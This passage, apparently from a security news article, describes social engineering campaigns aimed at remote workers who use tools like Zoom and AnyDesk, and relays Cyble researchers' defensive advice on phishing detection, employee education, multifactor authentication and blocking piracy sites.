Since the pandemic, the corporate workforce has become overall more geographically dispersed, posing unique security challenges. Software tools that make it easier for remote workers to collaborate — like Zoom and AnyDesk — have become popular targets not only for app-specific threats, but also for social engineering campaigns by attackers that want to capitalize on these challenges.

And while most corporate workers by now should know better, phishing remains a highly successful way for attackers to gain a foothold in an enterprise network, the researchers said. Because of this, Cybel researchers recommend that all enterprises use security products to detect phishing emails and websites across their network. These should also be extended to mobile devices accessing corporate networks, they said.

Enterprises should educate employees on the dangers of opening email attachments from untrusted sources, as well as downloading pirated software from the Internet, the researchers said. They should also reinforce the importance of using strong passwords and enforce multifactor authentication wherever possible.  

Finally, Cyble researchers advised that as a general rule of thumb, enterprises should block URLs — such as Torrent/Warez sites — that can be used to spread malware.

Tag

#chrome